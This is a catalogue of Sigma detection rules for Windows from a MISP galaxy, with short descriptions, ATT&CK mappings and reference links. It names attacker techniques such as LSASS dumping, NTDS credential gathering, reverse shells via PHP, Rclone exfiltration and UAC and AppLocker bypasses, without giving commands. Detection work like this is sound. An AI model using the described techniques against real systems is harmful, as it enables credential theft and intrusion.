Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.

The tag is: misp-galaxy:sigma-rules="Assembly Loading Via CL_LoadAssembly.ps1"

Assembly Loading Via CL_LoadAssembly.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10428. Table References

Links

https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml

Cloudflared Tunnel Connections Cleanup

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnel Connections Cleanup"

Cloudflared Tunnel Connections Cleanup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10429. Table References

Links

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-apps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml

Windows Admin Share Mount Via Net.EXE

Detects when an admin share is mounted using net.exe

The tag is: misp-galaxy:sigma-rules="Windows Admin Share Mount Via Net.EXE"

Windows Admin Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10430. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml

WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).

The tag is: misp-galaxy:sigma-rules="WebDav Client Execution Via Rundll32.EXE"

WebDav Client Execution Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 10431. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md

https://github.com/OTRF/detection-hackathon-apt29/issues/17

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml

Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)

The tag is: misp-galaxy:sigma-rules="Disable Windows IIS HTTP Logging"

Disable Windows IIS HTTP Logging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10432. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml

Renamed MegaSync Execution

Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

The tag is: misp-galaxy:sigma-rules="Renamed MegaSync Execution"

Renamed MegaSync Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10433. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml

Potential Persistence Attempt Via Run Keys Using Reg.EXE

Detects suspicious command line reg.exe tool adding key to RUN key in Registry

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via Run Keys Using Reg.EXE"

Potential Persistence Attempt Via Run Keys Using Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10434. Table References

Links

https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/

https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml

HackTool - Empire PowerShell UAC Bypass

Detects some Empire PowerShell UAC bypass methods

The tag is: misp-galaxy:sigma-rules="HackTool - Empire PowerShell UAC Bypass"

HackTool - Empire PowerShell UAC Bypass has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10435. Table References

Links

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml

Potential Shim Database Persistence via Sdbinst.EXE

Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

The tag is: misp-galaxy:sigma-rules="Potential Shim Database Persistence via Sdbinst.EXE"

Potential Shim Database Persistence via Sdbinst.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 10436. Table References

Links

https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml

Data Copied To Clipboard Via Clip.EXE

Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

The tag is: misp-galaxy:sigma-rules="Data Copied To Clipboard Via Clip.EXE"

Data Copied To Clipboard Via Clip.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 10437. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml

Php Inline Command Execution

Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.

The tag is: misp-galaxy:sigma-rules="Php Inline Command Execution"

Php Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10438. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.php.net/manual/en/features.commandline.php

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml

Suspicious Workstation Locking via Rundll32

Detects a suspicious call to the user32.dll function that locks the user workstation

The tag is: misp-galaxy:sigma-rules="Suspicious Workstation Locking via Rundll32"

Table 10439. Table References

Links

https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml

Arbitrary File Download Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via Squirrel.EXE"

Arbitrary File Download Via Squirrel.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10440. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/

http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml

PUA - RunXCmd Execution

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

The tag is: misp-galaxy:sigma-rules="PUA - RunXCmd Execution"

PUA - RunXCmd Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10441. Table References

Links

https://www.d7xtech.com/free-software/runx/

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml

DumpMinitool Execution

Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"

The tag is: misp-galaxy:sigma-rules="DumpMinitool Execution"

DumpMinitool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10442. Table References

Links

https://twitter.com/mrd0x/status/1511489821247684615

https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

https://twitter.com/mrd0x/status/1511415432888131586

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml

Potential Rundll32 Execution With DLL Stored In ADS

Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).

The tag is: misp-galaxy:sigma-rules="Potential Rundll32 Execution With DLL Stored In ADS"

Potential Rundll32 Execution With DLL Stored In ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10443. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rundll32

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml

PUA - Rclone Execution

Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc

The tag is: misp-galaxy:sigma-rules="PUA - Rclone Execution"

PUA - Rclone Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10444. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware

https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

The tag is: misp-galaxy:sigma-rules="Local File Read Using Curl.EXE"

Table 10445. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml

Deleted Data Overwritten Via Cipher.EXE

Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives

The tag is: misp-galaxy:sigma-rules="Deleted Data Overwritten Via Cipher.EXE"

Deleted Data Overwritten Via Cipher.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10446. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml

PUA - Nmap/Zenmap Execution

Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation

The tag is: misp-galaxy:sigma-rules="PUA - Nmap/Zenmap Execution"

PUA - Nmap/Zenmap Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 10447. Table References

Links

https://nmap.org/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml

Unsigned AppX Installation Attempt Using Add-AppxPackage

Detects usage of the "Add-AppxPackage" or it’s alias "Add-AppPackage" to install unsigned AppX packages

The tag is: misp-galaxy:sigma-rules="Unsigned AppX Installation Attempt Using Add-AppxPackage"

Table 10448. Table References

Links

https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package

https://twitter.com/WindowsDocs/status/1620078135080325122

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml

Esentutl Gather Credentials

Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.

The tag is: misp-galaxy:sigma-rules="Esentutl Gather Credentials"

Esentutl Gather Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10449. Table References

Links

https://attack.mitre.org/software/S0404/

https://twitter.com/vxunderground/status/1423336151860002816

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml

Suspicious Execution of Hostname

Use of hostname to get information

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Hostname"

Suspicious Execution of Hostname has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10450. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hostname_execution.yml

Process Access via TrolleyExpress Exclusion

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

The tag is: misp-galaxy:sigma-rules="Process Access via TrolleyExpress Exclusion"

Process Access via TrolleyExpress Exclusion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10451. Table References

Links

https://www.youtube.com/watch?v=Ie831jF0bb0

https://twitter.com/xpn/status/1491557187168178176

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml

PUA - NSudo Execution

Detects the use of NSudo tool for command execution

The tag is: misp-galaxy:sigma-rules="PUA - NSudo Execution"

PUA - NSudo Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10452. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://nsudo.m2team.org/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml

Suspicious GrpConv Execution

Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors

The tag is: misp-galaxy:sigma-rules="Suspicious GrpConv Execution"

Suspicious GrpConv Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 10453. Table References

Links

https://twitter.com/0gtweet/status/1526833181831200770

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses

Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses"

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10454. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml

WMI Backdoor Exchange Transport Agent

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

The tag is: misp-galaxy:sigma-rules="WMI Backdoor Exchange Transport Agent"

WMI Backdoor Exchange Transport Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10455. Table References

Links

https://twitter.com/cglyer/status/1182391019633029120

https://twitter.com/cglyer/status/1182389676876980224

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml

Automated Collection Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Automated Collection Command Prompt"

Automated Collection Command Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 10456. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml

Renamed Remote Utilities RAT (RURAT) Execution

Detects execution of renamed Remote Utilities (RURAT) via Product PE header field

The tag is: misp-galaxy:sigma-rules="Renamed Remote Utilities RAT (RURAT) Execution"

Table 10457. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml

Uncommon Child Process Spawned By Odbcconf.EXE

Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn’t have any child processes.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Spawned By Odbcconf.EXE"

Uncommon Child Process Spawned By Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10458. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml

AspNetCompiler Execution

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

The tag is: misp-galaxy:sigma-rules="AspNetCompiler Execution"

AspNetCompiler Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10460. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml

Suspicious Msiexec Quiet Install From Remote Location

Detects usage of Msiexec.exe to install packages hosted remotely quietly

The tag is: misp-galaxy:sigma-rules="Suspicious Msiexec Quiet Install From Remote Location"

Suspicious Msiexec Quiet Install From Remote Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10461. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml

HackTool - Pypykatz Credentials Dumping Activity

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored

The tag is: misp-galaxy:sigma-rules="HackTool - Pypykatz Credentials Dumping Activity"

HackTool - Pypykatz Credentials Dumping Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10462. Table References

Links

https://github.com/skelsec/pypykatz

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml

HackTool - CreateMiniDump Execution

Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker’s machine

The tag is: misp-galaxy:sigma-rules="HackTool - CreateMiniDump Execution"

HackTool - CreateMiniDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10463. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml

File Download via CertOC.EXE

Detects when a user downloads a file by using CertOC.exe

The tag is: misp-galaxy:sigma-rules="File Download via CertOC.EXE"

File Download via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10464. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download.yml

Outlook EnableUnsafeClientMailRules Setting Enabled

Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros

The tag is: misp-galaxy:sigma-rules="Outlook EnableUnsafeClientMailRules Setting Enabled"

Outlook EnableUnsafeClientMailRules Setting Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10465. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44

https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml

RDP Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule

The tag is: misp-galaxy:sigma-rules="RDP Port Forwarding Rule Added Via Netsh.EXE"

RDP Port Forwarding Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10466. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml

PowerShell Get-Clipboard Cmdlet Via CLI

Detects usage of the 'Get-Clipboard' cmdlet via CLI

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Clipboard Cmdlet Via CLI"

PowerShell Get-Clipboard Cmdlet Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 10467. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml

Potentially Suspicious Cabinet File Expansion

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Cabinet File Expansion"

Potentially Suspicious Cabinet File Expansion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10468. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml

Use Short Name Path in Command Line

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection

The tag is: misp-galaxy:sigma-rules="Use Short Name Path in Command Line"

Use Short Name Path in Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10469. Table References

Links

https://twitter.com/frack113/status/1555830623633375232

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml

Loaded Module Enumeration Via Tasklist.EXE

Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.

The tag is: misp-galaxy:sigma-rules="Loaded Module Enumeration Via Tasklist.EXE"

Loaded Module Enumeration Via Tasklist.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10470. Table References

Links

https://pentestlab.blog/tag/svchost/

https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml

Renamed Cloudflared.EXE Execution

Detects the execution of a renamed "cloudflared" binary.

The tag is: misp-galaxy:sigma-rules="Renamed Cloudflared.EXE Execution"

Renamed Cloudflared.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10471. Table References

Links

https://github.com/cloudflare/cloudflared/releases

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

https://www.intrinsec.com/akira_ransomware/

